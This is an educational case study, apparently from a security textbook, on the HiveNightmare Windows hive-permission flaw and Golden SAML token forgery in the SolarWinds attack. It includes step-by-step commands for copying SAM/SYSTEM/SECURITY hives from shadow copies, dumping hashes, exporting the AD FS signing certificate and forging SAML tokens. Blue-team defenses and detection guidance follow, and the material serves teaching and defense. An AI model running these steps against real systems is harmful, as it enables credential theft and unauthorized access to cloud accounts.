Case Study 2: HiveNightmare/SeriousSAM and Golden SAML in the SolarWinds Attack

Local Privilege Meets Global Compromise

Part I: HiveNightmare (CVE-2021-36934) --- Reading the Keys to the Kingdom

Overview

In July 2021, security researcher Jonas Lykkegaard discovered that Windows 10 and Windows 11 systems had incorrect Access Control Lists (ACLs) on the SAM, SYSTEM, and SECURITY registry hive files. This misconfiguration, dubbed HiveNightmare (also known as SeriousSAM), allowed any standard user to read these critical security databases---which contain local password hashes, cached domain credentials, and other sensitive security information.

The Vulnerability

The SAM (Security Account Manager), SYSTEM, and SECURITY registry hives are among the most sensitive files on a Windows system. The SAM contains password hashes for all local user accounts. The SYSTEM hive contains the encryption key needed to decrypt the SAM hashes. Together, they provide everything needed to extract local administrator password hashes.

Normally, these files are locked by the operating system and only accessible to SYSTEM. However, HiveNightmare revealed that Windows had been setting overly permissive ACLs on these files since Windows 10 version 1809 (October 2018 Update). The BUILTIN\Users group had read access to the registry hive files.

Direct access to the live hive files was still blocked by the operating system's file locking. However, Windows' Volume Shadow Copy Service (VSS) creates periodic backup snapshots of the system volume. These shadow copies contained the registry hives with the same permissive ACLs---and shadow copies are not locked.

Exploitation

# Step 1: Verify the vulnerability
# Check if standard users can read the SAM
icacls C:\Windows\System32\config\SAM
# Vulnerable output shows: BUILTIN\Users:(I)(RX)

# Step 2: List available shadow copies
vssadmin list shadows

# Step 3: Read SAM and SYSTEM from a shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\temp\SECURITY

# Step 4: Extract hashes on attacker machine
python3 secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

# Output:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

The dedicated HiveNightmare.exe tool automated this process:

# Using the dedicated exploit tool
HiveNightmare.exe
# Automatically finds shadow copies and extracts SAM, SYSTEM, SECURITY

Impact on MedSecure

During the MedSecure engagement, HiveNightmare was exploited on a Windows 10 workstation to extract the local administrator password hash. Because MedSecure had not implemented LAPS (Local Administrator Password Solution), the same local admin password was used across all workstations. The extracted hash provided local administrator access to every Windows 10 machine in the organization.

Microsoft's Response

Microsoft released patches in the July 2021 Cumulative Update that corrected the ACLs on the registry hive files. However, existing shadow copies retained the vulnerable ACLs until they were deleted. Microsoft recommended:

Apply the security update
Delete all existing shadow copies: vssadmin delete shadows /all /quiet
Create a new restore point

Part II: Golden SAML and the SolarWinds Attack

The SolarWinds Supply Chain Attack

The SolarWinds attack, discovered in December 2020, was one of the most sophisticated and consequential cyberattacks in history. The Russian foreign intelligence service (SVR, also known as APT29/Cozy Bear) compromised SolarWinds' Orion IT monitoring software build process, inserting a backdoor (SUNBURST) that was distributed to approximately 18,000 organizations through legitimate software updates. Among the victims were multiple U.S. government agencies, major technology companies, and critical infrastructure operators.

The Privilege Escalation Chain

The SolarWinds attack demonstrated a masterful privilege escalation chain that spanned from initial software compromise to complete domain dominance:

Initial Access: SUNBURST backdoor in Orion software (supply chain compromise)
Reconnaissance: SUNBURST performed extensive enumeration, lying dormant for up to two weeks to avoid detection
Lateral Movement: Leveraged Orion's legitimate network access (it monitors infrastructure, so it connects to everything)
Domain Compromise: Achieved domain administrator access through multiple techniques including Kerberoasting and credential dumping
Golden SAML: The ultimate persistence mechanism

What Is Golden SAML?

Golden SAML is a persistence and lateral movement technique that exploits the trust relationship between an identity provider (IdP) and service providers (SPs) in a federated authentication environment. Most enterprises use Active Directory Federation Services (AD FS) as their IdP, which authenticates users and issues SAML (Security Assertion Markup Language) tokens that grant access to cloud services like Microsoft 365, AWS, Salesforce, and others.

The AD FS server uses a private signing key (stored as a certificate) to sign SAML tokens. If an attacker obtains this signing key, they can forge SAML tokens for any user to any federated service---bypassing multi-factor authentication, conditional access policies, and any other security controls at the service provider level.

The SolarWinds Golden SAML Attack

The APT29 attackers:

Compromised the AD FS server using their domain administrator access
Extracted the token-signing certificate from the AD FS database
Forged SAML tokens impersonating high-privilege users
Accessed cloud email, documents, and applications for targeted users---including security and IT staff whose emails would reveal the organization's response to the breach

The forged tokens were indistinguishable from legitimate tokens because they were signed with the real signing key. No amount of cloud-side security could detect them. Multi-factor authentication was bypassed because SAML tokens are issued after authentication---the attacker never needed to authenticate.

Technical Execution

# Step 1: Extract AD FS signing certificate
# From the AD FS server (requires admin access):
# The certificate is in the AD FS configuration database
# or can be exported using Mimikatz/ADFSDump

# Using AADInternals (PowerShell)
Export-AADIntADFSSigningCertificate

# Using ADFSDump
ADFSDump.exe /domain:medsecure.local

# Step 2: Forge SAML token
# Using AADInternals
$token = New-AADIntSAMLToken -ImmutableId "USER_IMMUTABLE_ID" `
  -Issuer "http://medsecure.local/adfs/services/trust/" `
  -PfxFileName "adfs_cert.pfx" `
  -PfxPassword "password"

# Step 3: Use forged token to access Microsoft 365
# The token bypasses MFA and all cloud-side access controls
Open-AADIntOffice365Portal -SAMLToken $token

Connecting to Windows Privilege Escalation

Golden SAML illustrates why Windows privilege escalation matters far beyond the individual system. The attack chain that led to Golden SAML relied on:

Initial compromise of a single server (via supply chain attack)
Local privilege escalation to gain administrative access on compromised hosts
Credential harvesting (SeDebugPrivilege to dump LSASS, HiveNightmare-style SAM extraction)
Lateral movement using extracted credentials
Domain compromise giving access to the AD FS server
Golden SAML for cloud persistence

Without the ability to escalate privileges on individual Windows systems, the entire attack chain would have stalled at step 2.

🔵 Blue Team Perspective

HiveNightmare Defenses

Patch immediately and delete existing shadow copies
Implement LAPS to ensure unique local admin passwords
Monitor for shadow copy access patterns (Event ID 8222)
Regular ACL audits on sensitive system files

Golden SAML Defenses

Treat the AD FS server as a Tier 0 asset (same protection as domain controllers)
Rotate the AD FS token-signing certificate regularly
Monitor AD FS authentication logs for anomalous token issuance
Implement Conditional Access policies with device compliance
Use Azure AD Continuous Access Evaluation
Deploy Microsoft Defender for Identity on AD FS servers
Restrict access to the AD FS server to the absolute minimum number of administrators
Consider moving to Azure AD managed identity (cloud-based IdP) to eliminate on-premises AD FS

Detecting Golden SAML

Monitor for SAML tokens with unusual attributes (impossible travel, unusual user agents)
Compare token issuance logs on AD FS with authentication events at service providers
Alert on SAML token usage outside normal business hours or from unexpected locations
Implement token binding where supported

Discussion Questions

HiveNightmare resulted from incorrect ACLs that had been present since Windows 10 version 1809 (2018). How did this go undetected for nearly three years despite active security research on Windows?
The SolarWinds attackers chose Golden SAML for persistence over more traditional techniques (Golden Ticket, scheduled tasks, etc.). Why was this strategically superior?
How does the SolarWinds attack chain illustrate the concept of "identity is the new perimeter"?
If MedSecure had implemented LAPS before the engagement, how would the HiveNightmare finding's impact have differed?
What organizational structures and processes could have prevented the SolarWinds supply chain compromise from reaching domain administrator level?

References

CVE-2021-36934 (HiveNightmare/SeriousSAM) NVD Entry
Jonas Lykkegaard (@jonasLyk): Original disclosure thread
CyberArk: "Golden SAML: Newly Discovered Attack Technique Forges Authentication" (2017)
Microsoft: "Analyzing Solorigate: The Compromised DLL File That Started It Out"
CISA: Alert AA21-008A "Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments"
FireEye/Mandiant: "Highly Evasive Attacker Leverages SolarWinds Supply Chain" (December 2020)
Sygnia: "Golden SAML Technical Analysis"